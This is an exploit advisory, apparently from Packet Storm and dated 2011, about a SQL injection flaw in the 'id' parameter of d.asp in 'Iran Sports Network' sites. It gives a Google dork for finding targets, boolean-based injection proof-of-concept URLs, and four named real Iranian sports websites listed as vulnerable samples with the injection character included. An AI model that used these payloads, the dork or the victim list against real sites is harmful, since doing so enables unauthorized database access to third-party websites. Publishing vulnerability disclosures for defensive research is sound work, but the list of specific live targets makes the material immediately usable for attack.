Iran Sports Network suffers from a remote SQL injection vulnerability.
313de7f72a01e2adc00846d8d25134e08fcad8a8004e4e385dd96b4a476b5ffb
############################### HUT CNIS #############################
# Exploit Title: Iran sports network SQL INJECTION Vulnerability
# Date: [2011/10/19]
# Author: S.Azadi
# Google Dork: inurl:d.asp site:.ir
# Vulnerability Type: SQL Injection
# Version: All version
#---------------------------------------------------------------------
Technical Details:
- SQL INJECTION:
There is a SQLI vulnerability on “d.asp” page and parameter “id”.
http://sitename/d.asp?id=[SQLI]
PoC:
http://sitename/d.asp?id=25928 and 1=0;--
http://sitename/d.asp?id=25928 and 1=1;--
sample:
http://www.irantriathlon.ir/d.asp?id=25928’
http://www.sporttehran.ir/d.asp?id=25921’
http://www.chesstehran.ir/d.asp?id=26403’
http://www.blindsports.ir/d.asp?id=25862’
#
#
#
###########-HUT Center for Network and Information Security-################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed